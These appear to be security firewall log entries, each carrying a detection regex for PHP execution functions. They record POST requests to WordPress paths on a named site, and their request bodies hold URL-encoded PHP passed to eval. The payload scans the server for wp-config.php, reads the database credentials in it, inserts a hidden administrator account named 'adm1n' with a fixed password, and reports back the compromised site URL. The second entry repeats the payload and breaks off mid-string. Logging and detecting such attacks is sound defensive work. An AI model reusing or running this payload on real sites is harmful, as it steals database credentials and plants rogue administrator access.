["2026-05-16 12:16:55","213.209.159.254","POST","\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> mInwNQ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept:*\/*\nsec-ch-ua:\"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\ncontent-length:12663\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-encoding:gzip,deflate\nsec-fetch-site:none\nsec-fetch-user:?1\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36\n\nmInwNQ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 12:18:05","213.209.159.254","POST","\/wp-includes\/feed.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> dg:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%